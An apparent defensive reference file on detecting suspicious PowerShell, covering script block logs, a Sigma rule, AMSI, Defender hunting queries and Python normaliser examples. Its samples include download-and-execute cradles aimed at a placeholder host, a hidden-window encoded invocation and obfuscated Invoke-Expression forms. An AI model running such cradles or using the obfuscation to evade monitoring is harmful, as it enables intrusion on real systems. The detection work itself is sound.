Anthropic-Cybersecurity-Skills/skills/detecting-suspicious-powershell-execution/references/api-reference.md
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

# API Reference: Suspicious PowerShell Execution Detection
## Windows PowerShell Event Logs
### Event IDs
| Event ID | Log | Description |
|----------|-----|-------------|
| 4104 | Microsoft-Windows-PowerShell/Operational | Script block logging: the text of each script block as it is compiled (requires `EnableScriptBlockLogging`; PowerShell 5+ also logs blocks it considers suspicious at Warning level even when the policy is off) |
| 4103 | Microsoft-Windows-PowerShell/Operational | Module logging: pipeline execution with bound parameter values |
| 800 | Windows PowerShell | Pipeline execution details (classic log) |
| 400 | Windows PowerShell | Engine lifecycle: engine state changed to Available (session start) |
| 403 | Windows PowerShell | Engine lifecycle: engine state changed to Stopped (session end) |

A 4104 record holds the script block as PowerShell compiled it, so an `-EncodedCommand` payload appears decoded there, but runtime obfuscation (string concatenation, char arrays) is still present in the logged text.
### Script Block Logging Query
```powershell
# Latest 100 script blocks; Properties[2] is ScriptBlockText, Properties[3] is ScriptBlockId
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -MaxEvents 100 |
    Select-Object TimeCreated,
        @{ n = 'ScriptBlockId';   e = { $_.Properties[3].Value } },
        @{ n = 'ScriptBlockText'; e = { $_.Properties[2].Value } }
```
### Event 4104 Properties
| Index | Field | Description |
|-------|-------|-------------|
| 0 | MessageNumber | Block sequence number |
| 1 | MessageTotal | Total blocks in script |
| 2 | ScriptBlockText | Actual script content |
| 3 | ScriptBlockId | Unique script ID |
| 4 | Path | Script file path (empty for interactive or in-memory blocks) |

Long script blocks are split across several 4104 records that share one ScriptBlockId; MessageNumber and MessageTotal give the part index and count, so the text must be reassembled before matching on it.
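Reassembling split 4104 records, as an added example (it is not part of the skill's own `scripts/agent.py`). Events are modelled as dicts keyed by the five EventData field names above, which is what you get from `$_.Properties[n].Value` or from a SIEM's parsed XML; the three sample records are constructed for the example.

```python
"""Reassemble multi-part Event 4104 script blocks before matching on them."""
from collections import defaultdict

# Constructed sample: block "b1" arrives as two records (out of order), block
# "b2" is a single-part block loaded from a file. Field names match Event 4104.
SAMPLE_4104 = [
    {"MessageNumber": 2, "MessageTotal": 2, "ScriptBlockId": "b1",
     "ScriptBlockText": "; Invoke-Expression $x", "Path": ""},
    {"MessageNumber": 1, "MessageTotal": 1, "ScriptBlockId": "b2",
     "ScriptBlockText": "Get-Date", "Path": "C:\\ops\\daily.ps1"},
    {"MessageNumber": 1, "MessageTotal": 2, "ScriptBlockId": "b1",
     "ScriptBlockText": "$x = (New-Object Net.WebClient).DownloadString('http://example.test/a')",
     "Path": ""},
]


def reassemble(events):
    """Group 4104 records by ScriptBlockId and join their text in MessageNumber order.

    Returns (complete, partial): complete maps ScriptBlockId -> full text for
    blocks whose every part was seen; partial maps ScriptBlockId -> the part
    numbers seen so far, so a block with a missing fragment is not silently
    dropped (or matched against a truncated text).
    """
    parts = defaultdict(dict)
    totals = {}
    for ev in events:
        sbid = ev["ScriptBlockId"]
        parts[sbid][int(ev["MessageNumber"])] = ev["ScriptBlockText"]
        totals[sbid] = int(ev["MessageTotal"])

    complete, partial = {}, {}
    for sbid, chunks in parts.items():
        expected = range(1, totals[sbid] + 1)   # MessageNumber is 1-based
        if all(n in chunks for n in expected):
            complete[sbid] = "".join(chunks[n] for n in expected)
        else:
            partial[sbid] = sorted(chunks)
    return complete, partial


if __name__ == "__main__":
    done, missing = reassemble(SAMPLE_4104)
    for sbid, text in done.items():
        print(f"{sbid}: {text}")
    print("incomplete:", missing)
```

When fragments are collected from a live stream rather than a bounded query, keep the `partial` map across batches and only promote a block to `complete` once its last part arrives.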
## Suspicious PowerShell Patterns
### Execution Policy Bypass
```powershell
powershell -ExecutionPolicy Bypass -File script.ps1
# -ep bypass: execution policy, -nop: skip profile, -w hidden: hidden window,
# -enc: command supplied as base64 of UTF-16LE text
powershell -ep bypass -nop -w hidden -enc <base64>
```

Execution policy is not a security boundary: `-ExecutionPolicy Bypass` is a per-process setting that any user can pass, so its presence is a signal of intent, not a control that was defeated. `-enc` is one of the abbreviations powershell.exe accepts for `-EncodedCommand` (`-e` and `-ec` also work).
### Common Obfuscation Techniques
| Technique | Example |
|-----------|---------|
| Concatenation | `"Inv"+"oke-Ex"+"pression"` (run via `&` or `IEX`) |
| Backtick insertion | ``Invo`ke-Ex`pression`` (a backtick escapes the next character, so it is a no-op before letters that do not form an escape sequence such as `` `n `` or `` `t ``) |
| Variable indirection | `$c = 'Invoke-Expression'; & $c` |
| Encoded commands | `-enc SQBuAHYAbwBrAGUALQA...` (base64 of UTF-16LE text; this prefix decodes to `Invoke-`) |
| Char array | `[char[]]@(73,69,88) -join ''` (evaluates to `IEX`, the alias of `Invoke-Expression`) |
## Sigma Detection Rules
### Suspicious PowerShell Command Line
```yaml
title: Suspicious PowerShell Invocation
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - '-enc'
            - '-EncodedCommand'
            - 'FromBase64String'
            - 'DownloadString'
            - 'Invoke-Expression'
    condition: selection
level: high
```

Sigma `contains` matching is case-insensitive, so `'-enc'` already covers `-EncodedCommand` and its short forms. The rule only sees the command line as typed: for an encoded invocation it fires on the `-enc` wrapper, while `DownloadString` or `Invoke-Expression` inside the payload is invisible until the blob is decoded, and the tick, concatenation and char-array forms in the table above match none of the substrings at all. Expect noise from management tooling that legitimately launches PowerShell with `-EncodedCommand`; scoping the rule to the process image and excluding known parents is the usual tuning.
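The normaliser below, added here as an example (not the skill's or the Sigma project's code), undoes the four wrapper forms from the obfuscation table and then applies the Sigma rule's substring list to both the raw and the normalised command line, showing what the rule catches before and after decoding. The four sample command lines are constructed for the example; the `-enc` blob is built at run time from a plaintext payload.

```python
"""Normalise obfuscated PowerShell command lines, then apply the Sigma selection."""
import base64
import binascii
import re

# Substrings from the Sigma rule's CommandLine|contains list. Sigma matches them
# case-insensitively, so comparison is done on lowercased text.
SIGMA_CONTAINS = ["-enc", "-EncodedCommand", "FromBase64String",
                  "DownloadString", "Invoke-Expression"]

# powershell.exe accepts -e, -ec, -enc and any longer prefix of -EncodedCommand
# (with '-' or '/'); -ExecutionPolicy never matches because it has neither
# 'enc' nor whitespace directly after '-e'.
_ENC_RE = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)
# Ticks that are not real escape sequences (`n, `t, `0 ...) or escaped quotes/$.
_TICK_RE = re.compile(r"`(?![0abefnrtv`\"'$])")
_CONCAT_RE = re.compile(r"([\"'])([^\"']*)\1\s*\+\s*([\"'])([^\"']*)\3")
_CHARARR_RE = re.compile(r"\[char\[\]\]\s*@?\(\s*([\d\s,]+)\)\s*-join\s*(['\"])\2", re.I)
_IEX_RE = re.compile(r"\biex\b", re.I)


def decode_encoded_command(b64):
    """-EncodedCommand payloads are base64 of UTF-16LE text; None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def normalise(cmdline):
    text = cmdline
    enc = _ENC_RE.search(text)
    if enc:
        decoded = decode_encoded_command(enc.group(1))
        if decoded is not None:
            # Keep the wrapper flags, replace the blob with its plaintext.
            text = text[:enc.start(1)] + decoded + text[enc.end(1):]
    text = _TICK_RE.sub("", text)
    while True:                      # fold "a"+"b"+"c" until nothing changes
        folded = _CONCAT_RE.sub(lambda mm: '"' + mm.group(2) + mm.group(4) + '"', text)
        if folded == text:
            break
        text = folded
    text = _CHARARR_RE.sub(
        lambda mm: '"' + "".join(chr(int(n)) for n in mm.group(1).split(",")) + '"', text)
    return _IEX_RE.sub("Invoke-Expression", text)   # expand the alias


def sigma_hits(text):
    low = text.lower()
    return [s for s in SIGMA_CONTAINS if s.lower() in low]


def analyse(cmdline):
    norm = normalise(cmdline)
    return {"normalised": norm,
            "raw_hits": sigma_hits(cmdline),
            "normalised_hits": sigma_hits(norm)}


# Constructed samples (hostnames and paths are placeholders).
_PAYLOAD = "(New-Object Net.WebClient).DownloadString('http://example.test/s.ps1') | IEX"
ENCODED_SAMPLE = ("powershell -ep bypass -nop -w hidden -enc "
                  + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode())
TICK_SAMPLE = "powershell -c \"Invo`ke-Ex`pression ('Down'+'loadString')\""
CHARARR_SAMPLE = "powershell -c \"& ([char[]]@(73,69,88) -join '') $s\""
BENIGN_SAMPLE = "powershell -File C:\\ops\\backup.ps1 -ExecutionPolicy RemoteSigned"

if __name__ == "__main__":
    for sample in (ENCODED_SAMPLE, TICK_SAMPLE, CHARARR_SAMPLE, BENIGN_SAMPLE):
        r = analyse(sample)
        print(f"raw={r['raw_hits']} normalised={r['normalised_hits']}\n  {r['normalised']}")
```

The backtick rule deliberately leaves ticks before escape letters alone, which is also the constraint obfuscators work under: a tick before `n` would turn into a newline, so tools insert them only where they are no-ops. Run on a 4104 ScriptBlockText instead of a process command line, the same normaliser is applied to already-decoded content, so only the tick, concatenation and char-array steps do any work there.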
## AMSI (Antimalware Scan Interface)
### AMSI Scan Functions
```c
HRESULT AmsiScanBuffer(
    HAMSICONTEXT amsiContext,   // context from AmsiInitialize()
    PVOID        buffer,        // content to scan; PowerShell passes the script block text
    ULONG        length,        // size of buffer in bytes
    LPCWSTR      contentName,   // file name, URL or script identifier for the provider's log
    HAMSISESSION amsiSession,   // optional session handle to correlate related scans
    AMSI_RESULT  *result        // verdict, see the table below
);
```

PowerShell submits each script block to `AmsiScanBuffer` before running it, so AMSI and Event 4104 see the same text; a provider's block (result `AMSI_RESULT_DETECTED` or higher) stops the block from executing.
### AMSI Results
| Value | Constant | Meaning |
|-------|----------|---------|
| 0 | `AMSI_RESULT_CLEAN` | Known good; the verdict is unlikely to change after a definition update |
| 1 | `AMSI_RESULT_NOT_DETECTED` | No detection, but the verdict may change after a definition update |
| 16384 to 20479 | `AMSI_RESULT_BLOCKED_BY_ADMIN_START` to `_END` | Blocked by administrator policy |
| 32768 and above | `AMSI_RESULT_DETECTED` | Detected as malware; the `AmsiResultIsMalware()` macro in amsi.h is true for any value at or above this |
## Microsoft Defender ATP API
### Advanced Hunting Query
```http
POST https://api.securitycenter.microsoft.com/api/advancedqueries/run
Authorization: Bearer {token}
Content-Type: application/json

{
  "Query": "DeviceProcessEvents | where FileName in~ ('powershell.exe', 'pwsh.exe') | where ProcessCommandLine has_any ('encodedcommand', 'downloadstring', 'invoke-expression') | project Timestamp, DeviceName, ProcessCommandLine | take 100"
}
```

`advancedqueries/run` is the Defender for Endpoint (formerly Defender ATP) endpoint on `api.securitycenter.microsoft.com`; the Microsoft 365 Defender host `api.security.microsoft.com` exposes the same query at `/api/advancedhunting/run` with the same `Query` body. In KQL `==` is case-sensitive, so use `=~` or `in~` for file names; `has_any` is already case-insensitive but matches whole terms, so it finds `-EncodedCommand` but not the `-enc` short form. The response is a JSON object with a `Schema` array (column names and types) and a `Results` array of rows.
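A small client for the call above, added as an example (not the skill's own `scripts/agent.py`). It builds the query with case-insensitive operators, posts it with `urllib` from the standard library, and flattens the `Schema`/`Results` response. The HTTP transport is injectable so the parsing runs offline against a constructed response; the token is assumed to come from an Azure AD app granted the `AdvancedQuery.Read.All` permission.

```python
"""Run an Advanced Hunting query against the Defender for Endpoint API."""
import json
import urllib.request

MDE_ENDPOINT = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"
INDICATORS = ["encodedcommand", "downloadstring", "invoke-expression", "frombase64string"]


def build_query(indicators=INDICATORS, hours=24, limit=100):
    """KQL for PowerShell process creations carrying any indicator term.
    in~ and has_any are case-insensitive, so the terms can stay lowercase."""
    terms = ", ".join(f"'{i}'" for i in indicators)
    return (
        f"DeviceProcessEvents | where Timestamp > ago({hours}h)"
        " | where FileName in~ ('powershell.exe', 'pwsh.exe')"
        f" | where ProcessCommandLine has_any ({terms})"
        " | project Timestamp, DeviceName, AccountName, ProcessCommandLine"
        f" | take {limit}"
    )


def run_advanced_hunting(token, query, transport=None):
    """POST the query; returns the parsed body ({'Schema': [...], 'Results': [...]}).
    transport(req) -> bytes/str replaces the network when given (used for tests)."""
    body = json.dumps({"Query": query}).encode()
    req = urllib.request.Request(
        MDE_ENDPOINT, data=body, method="POST",
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json"})
    if transport is None:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    return json.loads(transport(req))


def rows_from_response(payload):
    """Flatten Results to tuples in the column order the Schema declares."""
    columns = [c["Name"] for c in payload["Schema"]]
    return [tuple(r.get(c) for c in columns) for r in payload["Results"]]


# Constructed sample response in the shape the API returns (Schema + Results);
# the device and account names are placeholders.
SAMPLE_RESPONSE = json.dumps({
    "Schema": [{"Name": "Timestamp", "Type": "DateTime"},
               {"Name": "DeviceName", "Type": "String"},
               {"Name": "AccountName", "Type": "String"},
               {"Name": "ProcessCommandLine", "Type": "String"}],
    "Results": [{"Timestamp": "2026-03-10T09:12:44Z",
                 "DeviceName": "ws01.example.test",
                 "AccountName": "jdoe",
                 "ProcessCommandLine":
                     "powershell -nop -w hidden -EncodedCommand SQBuAHYAbwBrAGUALQA="}],
})


def fake_transport(req):
    """Stand-in for the network: checks the request shape, returns the sample."""
    if req.get_method() != "POST" or req.get_header("Content-type") != "application/json":
        raise ValueError("request is not a JSON POST")
    if not req.get_header("Authorization", "").startswith("Bearer "):
        raise ValueError("missing bearer token")
    return SAMPLE_RESPONSE


if __name__ == "__main__":
    data = run_advanced_hunting("placeholder-token", build_query(), transport=fake_transport)
    for row in rows_from_response(data):
        print(row)
```

Feed the `ProcessCommandLine` column into the same decoding step used for Sigma matching before triage: the `has_any` filter finds the `-EncodedCommand` wrapper, but what the blob contains is only visible after it is decoded.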